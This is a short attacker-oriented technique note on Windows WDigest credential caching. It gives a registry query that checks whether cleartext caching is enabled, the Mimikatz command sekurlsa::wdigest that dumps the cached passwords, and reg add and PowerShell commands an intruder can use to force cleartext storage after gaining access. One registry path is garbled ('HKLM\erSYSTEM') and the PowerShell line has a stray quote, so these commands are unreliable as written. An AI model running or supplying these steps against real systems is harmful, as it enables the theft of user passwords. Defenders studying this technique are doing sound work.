WDigest

WDigest (Digest Authentication) is a challenge/response protocol that was primarily used in Windows Server 2003 for LDAP and web-based authentication. It utilizes Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges to authenticate.

It should be noted that up to Windows 8 and Windows Server 2012 storing credentials in WDigest was a default setting. This is no longer the case with Windows 10 and Windows Server 2016+. Additionally, it should be noted that WDigest credentials are cached in memory in cleartext.

It is easy to verify whether or not caching is enabled by querying the following registry key:

reg query HKLM\erSYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

If identified, WDigest credentials can be retrieved with a tool such as Mimikatz:

sekurlsa::wdigest

Forcing Credential Storage in WDigest

It should be noted that even though storing credentials in WDigest is no longer a default setting, it is still something that can be manually configured by an attacker after obtaining access to a system by modifying the following registry value:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name "UseLogonCredential" -Value '1'"

We would then be able to dump any users credentials who authenticate to the system with a tool like Mimikatz.

References

WDigest Clear-Text Passwords: Stealing More than a Hashstealthbits.com

Forcing WDigest to Store Credentials in Plaintext | Red Team Noteswww.ired.team